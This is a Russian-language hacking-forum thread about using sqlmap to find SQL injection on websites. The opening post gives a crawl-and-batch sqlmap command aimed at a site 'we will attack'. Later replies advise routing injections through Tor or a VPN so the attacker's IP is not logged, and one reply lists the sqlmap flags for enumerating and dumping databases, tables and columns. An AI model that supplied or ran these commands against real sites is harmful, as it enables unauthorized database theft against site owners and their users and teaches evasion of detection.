Загрузка...

Author's article Finding vulnerabilities with SQLMap

Thread in Web vulnerabilities created by Dope_inactive33786 May 24, 2016. 11,911 views

  1. Dope_inactive33786
    Dope_inactive33786 Topic starter May 24, 2016 Banned 265 Feb 11, 2016
    Прописываем в SQLMap следующее:
    Code
    sqlmap.py --random-agent -u lolzteam.org --form --crawl=2 --batch
    , где
    --crawl=2 <- сканирование структуры сайта
    --batch <- Автоматизация процесса, впредь до конца атаки
    --random-agent = рандомный юзер агент
    site.org <- сайт, на который мы будем совершать атаку
    Думаю суть вы поняли, конкретно мои настройки выглядят примерно так:

    , но вы юзайте как вам удобно, основу я дал.
     
  2. 13loodislav
    Спасибо
     
  3. hybridminds
    Можно спросить что дальше делать, когда дочекает сайтик ?)
     
  4. mohands
    mohands Jun 20, 2016 0 Jun 12, 2016
    thanks r sharing this
     
  5. RaysMorgan
    RaysMorgan Jun 20, 2016 123 53,978 Mar 7, 2013
  6. Dwein
    Dwein Jun 21, 2016 11 Feb 25, 2016
    найс статья
     
  7. hybridminds
  8. Ilyas_inactive33509
    Ilyas_inactive33509 Aug 18, 2016 Banned 83 Feb 7, 2016
  9. Danilo_7767808
    Спасибо
     
  10. NiceGood
    NiceGood Jan 11, 2017 1 Dec 11, 2016
    ****** еще нужны?
     
  11. ТипаЕллиот
    NiceGood, ****** при сканировании сайта не нужны,ибо обычно система ничего не палит. Но если проводить инжект через sqlmap,то бот начнёт сеять панику и запишет твой IP в ****)
    Атаку с sqlmap можно провести и с помощью Tor)
     
  12. what7up
    what7up Feb 27, 2017 Banned 43 Dec 25, 2016
    А если пользоваться ***'ом то все норм будет?
     
  13. ТипаЕллиот
    @what7up,А чем Tor отличается от ***?
     
  14. MavRikoZ
    MavRikoZ Feb 28, 2017 0 Feb 14, 2017
    Может тем что Tor подключается к цепочке серверов, а подключаясь к *** ты подключаешься к одному серверу
     
  15. ТипаЕллиот
    Господи.Я знаю... Сударь,вы не понимаете сарказма.
     
  16. dramzar_inactive140430
    dramzar_inactive140430 Jul 12, 2017 Banned 56 Jul 10, 2017
    Очень пригодилось,спасибо!
     
  17. romcka1987
    А как потом раскручивать уязвимость? Мануалы есть подробные? Что сайт уязвим, можно и без sqlmap узнать.
     
  18. sourse21
    sourse21 Sep 3, 2017 Banned 10 Jun 5, 2017
    На нормальных сайтах не узнаешь.
    Что раскручивать??? приписываешь:
    1." --dbs " список баз данных
    2."-D Назв_базы --tables"
    3."-D Назв_базы -T Назв_таблицы --colums "
    4."-D Назв_базы -T Назв_таблицы -C Назв_колноки1, Назв_колонкиN --dump"
     
  19. romcka1987
    Спасибо, будем тестировать.
     
  20. Checkerchin
    Checkerchin Nov 23, 2017 178 Apr 16, 2017
    Помогло
     
Loading...
Top